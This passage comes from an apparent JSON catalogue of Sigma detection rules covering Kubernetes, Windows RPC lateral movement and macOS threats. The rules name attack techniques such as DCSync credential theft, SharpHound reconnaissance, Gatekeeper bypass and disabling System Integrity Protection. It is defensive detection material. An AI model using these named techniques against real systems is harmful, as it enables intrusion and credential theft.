"3132570d-cab2-4561-9ea6-1743644b2290", "value": "Kubernetes Events Deleted" }, { "description": "Detects the creation of a \"privileged\" container, an action which could be indicative of a threat actor mounting a container breakout attack.\nA privileged container is a container that can access the host with all of the root capabilities of the host machine. 
This allows it to view, interact and modify processes, network operations, IPC calls, the file system, mount points, SELinux configurations etc. as the root user on the host.\nVarious versions of \"privileged\" containers can be specified, e.g. by setting the securityContext.privileged flag in the resource specification, setting non-standard Linux capabilities, or configuring the hostNetwork/hostPID fields\n", "meta": { "author": "Leo Tsaousis (@laripping)", "creation_date": "2024-03-26", "falsepositive": [ "Unknown" ], "filename": "kubernetes_audit_privileged_pod_creation.yml", "level": "low", "logsource.category": "application", "logsource.product": "kubernetes", "refs": [ "https://www.elastic.co/guide/en/security/current/kubernetes-pod-created-with-hostnetwork.html", "https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-kubernetes.html#privilegeescalation-kubernetes-privilegedcontainer", "https://www.elastic.co/guide/en/security/current/kubernetes-container-created-with-excessive-linux-capabilities.html", "https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Privileged%20container/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/kubernetes/audit/kubernetes_audit_privileged_pod_creation.yml" ], "tags": [ "attack.t1611" ] }, "related": [ { "dest-uuid": "4a5b7ade-8bb5-4853-84ed-23f262002665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c5cd1b20-36bb-488d-8c05-486be3d0cb97", "value": "Privileged Container Deployed" }, { "description": "Detects the removal of a deployment from a Kubernetes cluster.\nThis could indicate disruptive activity aiming to impact business operations.\n", "meta": { "author": "Leo Tsaousis (@laripping)", "creation_date": "2024-03-26", "falsepositive": [ "Unknown" ], "filename": "kubernetes_audit_deployment_deleted.yml", "level": "low", "logsource.category": "application", "logsource.product": "kubernetes", "refs": [ 
"https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Data%20destruction/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/kubernetes/audit/kubernetes_audit_deployment_deleted.yml" ], "tags": [ "attack.t1498" ] }, "related": [ { "dest-uuid": "d74c4a7e-ffbf-432f-9365-7ebf1f787cab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "40967487-139b-4811-81d9-c9767a92aa5a", "value": "Deployment Deleted From Kubernetes Cluster" }, { "description": "Detects attempts to inject a sidecar container into a running deployment.\nA sidecar container is an additional container within a pod that resides alongside the main container.\nOne way to add containers to running resources like Deployments/DaemonSets/StatefulSets is via a \"kubectl patch\" operation.\nBy injecting a new container into a legitimate pod, an attacker can run their code and hide their activity, instead of running their own separate pod in the cluster.\n", "meta": { "author": "Leo Tsaousis (@laripping)", "creation_date": "2024-03-26", "falsepositive": [ "Unknown" ], "filename": "kubernetes_audit_sidecar_injection.yml", "level": "medium", "logsource.category": "application", "logsource.product": "kubernetes", "refs": [ "https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Sidecar%20Injection/", "https://kubernetes.io/docs/tasks/manage-kubernetes-objects/update-api-object-kubectl-patch", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/kubernetes/audit/kubernetes_audit_sidecar_injection.yml" ], "tags": [ "attack.t1609" ] }, "related": [ { "dest-uuid": "7b50a1d3-4ca7-45d1-989d-a6503f04bfe1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ad9012a6-e518-4432-9890-f3b82b8fc71f", "value": "Potential Sidecar Injection Into Running Deployment" }, { "description": "Detects remote RPC calls to get event log information via EVEN or 
EVEN6", "meta": { "author": "Sagie Dulce, Dekel Paz", "creation_date": "2022-01-01", "falsepositive": [ "Remote administrative tasks on Windows Events" ], "filename": "rpc_firewall_eventlog_recon.yml", "level": "high", "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_eventlog_recon.yml" ], "tags": [ "attack.discovery" ] }, "uuid": "2053961f-44c7-4a64-b62d-f6e72800af0d", "value": "Remote Event Log Recon" }, { "description": "Detects remote RPC calls to read information about scheduled tasks via SASec", "meta": { "author": "Sagie Dulce, Dekel Paz", "creation_date": "2022-01-01", "falsepositive": [ "Unknown" ], "filename": "rpc_firewall_sasec_recon.yml", "level": "high", "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_recon.yml" ], "tags": [ "attack.discovery" ] }, "uuid": "0a3ff354-93fc-4273-8a03-1078782de5b7", "value": "Recon Activity via SASec" }, { "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR", "meta": { "author": "Sagie Dulce, Dekel Paz", "creation_date": "2022-01-01", "falsepositive": [ "Legitimate usage of remote file encryption" ], "filename": "rpc_firewall_efs_abuse.yml", "level": "high", "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ 
"https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md", "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_efs_abuse.yml" ], "tags": [ "attack.lateral-movement" ] }, "uuid": "5f92fff9-82e2-48eb-8fc1-8b133556a551", "value": "Remote Encrypting File System Abuse" }, { "description": "Detects remote RPC calls that perform remote DCOM operations. These could be abused for lateral movement via DCOM or WMI.", "meta": { "author": "Sagie Dulce, Dekel Paz", "creation_date": "2022-01-01", "falsepositive": [ "Some administrative tasks on remote host" ], "filename": "rpc_firewall_remote_dcom_or_wmi.yml", "level": "high", "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.003", "attack.t1047" ] }, "related": [ { "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "68050b10-e477-4377-a99b-3721b422d6ef", "value": "Remote DCOM/WMI Lateral Movement" }, { "description": "Detects remote RPC calls to create or execute a scheduled task via ATSvc", "meta": { "author": "Sagie Dulce, Dekel Paz", 
"creation_date": "2022-01-01", "falsepositive": [ "Unknown" ], "filename": "rpc_firewall_atsvc_lateral_movement.yml", "level": "high", "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml" ], "tags": [ "attack.lateral-movement", "attack.t1053", "attack.t1053.002" ] }, "related": [ { "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f3d95a1f-bba2-44ce-9af7-37866cd63fd0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0fcd1c79-4eeb-4746-aba9-1b458f7a79cb", "value": "Remote Schedule Task Lateral Movement via ATSvc" }, { "description": "Detects remote RPC calls to create or execute a scheduled task", "meta": { "author": "Sagie Dulce, Dekel Paz", "creation_date": "2022-01-01", "falsepositive": [ "Unknown" ], "filename": "rpc_firewall_itaskschedulerservice_lateral_movement.yml", "level": "high", "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml" ], "tags": [ "attack.lateral-movement", "attack.t1053", "attack.t1053.002" ] }, "related": [ { "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f3d95a1f-bba2-44ce-9af7-37866cd63fd0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ace3ff54-e7fd-46bd-8ea0-74b49a0aca1d", "value": "Remote Schedule Task Lateral Movement via ITaskSchedulerService" }, { "description": "Detects remote RPC calls used by SharpHound to map remote connections and local group membership.", "meta": { "author": "Sagie Dulce, Dekel Paz", "creation_date": "2022-01-01", "falsepositive": [ "Unknown" ], "filename": "rpc_firewall_sharphound_recon_account.yml", "level": "high", "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ "https://github.com/zeronetworks/rpcfirewall", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml" ], "tags": [ "attack.t1087", "attack.discovery" ] }, "related": [ { "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "65f77b1e-8e79-45bf-bb67-5988a8ce45a5", "value": "SharpHound Recon Account Discovery" }, { "description": "Detects remote RPC calls to possibly abuse remote printing service via MS-RPRN / MS-PAR", "meta": { "author": "Sagie Dulce, Dekel 
Paz", "creation_date": "2022-01-01", "falsepositive": [ "Actual printing" ], "filename": "rpc_firewall_printing_lateral_movement.yml", "level": "high", "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8", "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_printing_lateral_movement.yml" ], "tags": [ "attack.lateral-movement" ] }, "uuid": "bc3a4b0c-e167-48e1-aa88-b3020950e560", "value": "Remote Printing Abuse for Lateral Movement" }, { "description": "Detects remote RPC calls to create or execute a scheduled task via SASec", "meta": { "author": "Sagie Dulce, Dekel Paz", "creation_date": "2022-01-01", "falsepositive": [ "Unknown" ], "filename": "rpc_firewall_sasec_lateral_movement.yml", "level": "high", "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml" ], "tags": [ "attack.lateral-movement", "attack.t1053", "attack.t1053.002" ] }, "related": [ { "dest-uuid": 
"35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f3d95a1f-bba2-44ce-9af7-37866cd63fd0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aff229ab-f8cd-447b-b215-084d11e79eb0", "value": "Remote Schedule Task Lateral Movement via SASec" }, { "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR", "meta": { "author": "Sagie Dulce, Dekel Paz", "creation_date": "2022-01-01", "falsepositive": [ "Administrative tasks on remote services" ], "filename": "rpc_firewall_remote_service_lateral_movement.yml", "level": "high", "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ "https://github.com/zeronetworks/rpcfirewall", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_service_lateral_movement.yml" ], "tags": [ "attack.lateral-movement", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "10018e73-06ec-46ec-8107-9172f1e04ff2", "value": "Remote Server Service Abuse for Lateral Movement" }, { "description": "Detects remote RPC calls to MS-DRSR from non DC hosts, which could indicate DCSync / DCShadow attacks.", "meta": { "author": "Sagie Dulce, Dekel Paz", "creation_date": "2022-01-01", "falsepositive": [ "Unknown" ], "filename": "rpc_firewall_dcsync_attack.yml", "level": "high", "logsource.category": "application", "logsource.product": 
"rpc_firewall", "refs": [ "https://github.com/zeronetworks/rpcfirewall", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_dcsync_attack.yml" ], "tags": [ "attack.t1033", "attack.discovery" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "56fda488-113e-4ce9-8076-afc2457922c3", "value": "Possible DCSync Attack" }, { "description": "Detects remote RPC calls to read information about scheduled tasks", "meta": { "author": "Sagie Dulce, Dekel Paz", "creation_date": "2022-01-01", "falsepositive": [ "Unknown" ], "filename": "rpc_firewall_itaskschedulerservice_recon.yml", "level": "high", "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_recon.yml" ], "tags": [ "attack.discovery" ] }, "uuid": "7f7c49eb-2977-4ac8-8ab0-ab1bae14730e", "value": "Remote Schedule Task Recon via ITaskSchedulerService" }, { "description": "Detects remote RPC calls to modify the registry and possibly execute code", "meta": { "author": "Sagie Dulce, Dekel Paz", "creation_date": "2022-01-01", "falsepositive": [ 
"Remote administration of registry values" ], "filename": "rpc_firewall_remote_registry_lateral_movement.yml", "level": "high", "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml" ], "tags": [ "attack.lateral-movement", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "35c55673-84ca-4e99-8d09-e334f3c29539", "value": "Remote Registry Lateral Movement" }, { "description": "Detects remote RPC calls to read information about scheduled tasks via ATSvc", "meta": { "author": "Sagie Dulce, Dekel Paz", "creation_date": "2022-01-01", "falsepositive": [ "Unknown" ], "filename": "rpc_firewall_atsvc_recon.yml", "level": "high", "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_recon.yml" ], "tags": [ "attack.discovery" ] }, "uuid": "f177f2bc-5f3e-4453-b599-57eefce9a59c", "value": "Remote Schedule Task Recon via AtScv" }, { "description": "Detects 
remote RPC calls to collect information", "meta": { "author": "Sagie Dulce, Dekel Paz", "creation_date": "2022-01-01", "falsepositive": [ "Remote administration of registry values" ], "filename": "rpc_firewall_remote_registry_recon.yml", "level": "high", "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_recon.yml" ], "tags": [ "attack.discovery" ] }, "uuid": "d8ffe17e-04be-4886-beb9-c1dd1944b9a8", "value": "Remote Registry Recon" }, { "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-SRVS", "meta": { "author": "Sagie Dulce, Dekel Paz", "creation_date": "2022-01-01", "falsepositive": [ "Legitimate remote share creation" ], "filename": "rpc_firewall_remote_server_service_abuse.yml", "level": "high", "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_server_service_abuse.yml" ], "tags": [ "attack.lateral-movement" ] }, "uuid": "b6ea3cc7-542f-43ef-bbe4-980fbed444c7", "value": "Remote Server Service Abuse" }, { "description": "Detects remote RPC calls used by 
SharpHound to map remote connections and local group membership.", "meta": { "author": "Sagie Dulce, Dekel Paz", "creation_date": "2022-01-01", "falsepositive": [ "Unknown" ], "filename": "rpc_firewall_sharphound_recon_sessions.yml", "level": "high", "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/zeronetworks/rpcfirewall", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml" ], "tags": [ "attack.t1033" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6d580420-ff3f-4e0e-b6b0-41b90c787e28", "value": "SharpHound Recon Sessions" }, { "description": "Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges.", "meta": { "author": "Alejandro Ortuno, oscd.community", "creation_date": "2020-10-23", "falsepositive": [ "Legitimate administration activities" ], "filename": "file_event_macos_emond_launch_daemon.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "macos", "refs": [ "https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_emond_launch_daemon.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1546.014" ] }, "related": [ { "dest-uuid": 
"9c45eaa3-8604-4780-8988-b5074dbb9ecd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "23c43900-e732-45a4-8354-63e4a6c187ce", "value": "MacOS Emond Launch Daemon" }, { "description": "Detects the creation of a startup item plist file that automatically gets executed at boot initialization to establish persistence.\nAdversaries may use startup items automatically executed at boot initialization to establish persistence.\nStartup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.\n", "meta": { "author": "Alejandro Ortuno, oscd.community", "creation_date": "2020-10-14", "falsepositive": [ "Legitimate administration activities" ], "filename": "file_event_macos_susp_startup_item_created.yml", "level": "low", "logsource.category": "file_event", "logsource.product": "macos", "refs": [ "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.005/T1037.005.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_susp_startup_item_created.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1037.005" ] }, "related": [ { "dest-uuid": "c0dfe7b0-b873-4618-9ff8-53e31f70907f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dfe8b941-4e54-4242-b674-6b613d521962", "value": "Startup Item File Created - MacOS" }, { "description": "Detects macOS Gatekeeper bypass via xattr utility", "meta": { "author": "Daniil Yugoslavskiy, oscd.community", "creation_date": "2020-10-19", "falsepositive": [ "Legitimate activities" ], "filename": 
"proc_creation_macos_xattr_gatekeeper_bypass.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/1fed40dc7e48f16ed44dcdd9c73b9222a70cca85/atomics/T1553.001/T1553.001.md", "https://www.loobins.io/binaries/xattr/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_xattr_gatekeeper_bypass.yml" ], "tags": [ "attack.defense-evasion", "attack.t1553.001" ] }, "related": [ { "dest-uuid": "31a0a2ac-c67c-4a7e-b9ed-6a96477d4e8e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f5141b6d-9f42-41c6-a7bf-2a780678b29b", "value": "Gatekeeper Bypass via Xattr" }, { "description": "Detects the use of csrutil to disable System Integrity Protection (SIP). This technique is used in post-exploitation scenarios.\n", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2024-01-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_macos_csrutil_disable.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://ss64.com/osx/csrutil.html", "https://objective-see.org/blog/blog_0x6D.html", "https://www.virustotal.com/gui/file/05a2adb266ec6c0ba9ed176d87d8530e71e845348c13caf9f60049760c312cd3/behavior", "https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_csrutil_disable.yml" ], "tags": [ "attack.discovery", "attack.t1518.001" ] }, "related": [ { "dest-uuid": "cba37adb-d6fb-4610-b069-dd04c0643384", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3603f18a-ec15-43a1-9af2-d196c8a7fec6", "value": "System Integrity Protection (SIP) Disabled" }, { "description": "Detects usage of \"find\" binary in a 
suspicious manner to perform discovery", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_macos_susp_find_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_find_execution.yml" ], "tags": [ "attack.discovery", "attack.t1083" ] }, "related": [ { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "85de3a19-b675-4a51-bfc6-b11a5186c971", "value": "Potential Discovery Activity Using Find - MacOS" }, { "description": "Detects potential suspicious run-only executions compiled using OSACompile", "meta": { "author": "Sohan G (D4rkCiph3r)", "creation_date": "2023-01-31", "falsepositive": [ "Unknown" ], "filename": "proc_creation_macos_osacompile_runonly_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://ss64.com/osx/osacompile.html", "https://redcanary.com/blog/applescript/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_osacompile_runonly_execution.yml" ], "tags": [ "attack.t1059.002", "attack.execution" ] }, "related": [ { "dest-uuid": "37b11151-1776-4f8f-b328-30939fbf2ceb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b9d9b652-d8ed-4697-89a2-a1186ee680ac", "value": "OSACompile Run-Only Execution" }, { "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.", "meta": { "author": "Igor Fits, Mikhail Larin, oscd.community", "creation_date": "2020-10-19", "falsepositive": [ 
"Legitimate administrative activity" ], "filename": "proc_creation_macos_system_shutdown_reboot.yml", "level": "informational", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_shutdown_reboot.yml" ], "tags": [ "attack.impact", "attack.t1529" ] }, "related": [ { "dest-uuid": "ff73aa03-0090-4464-83ac-f89e233c02bc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "40b1fbe2-18ea-4ee7-be47-0294285811de", "value": "System Shutdown/Reboot - MacOs" }, { "description": "Detects possible malicious execution of JXA in-memory via OSAScript", "meta": { "author": "Sohan G (D4rkCiph3r)", "creation_date": "2023-01-31", "falsepositive": [ "Unknown" ], "filename": "proc_creation_macos_jxa_in_memory_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://redcanary.com/blog/applescript/", 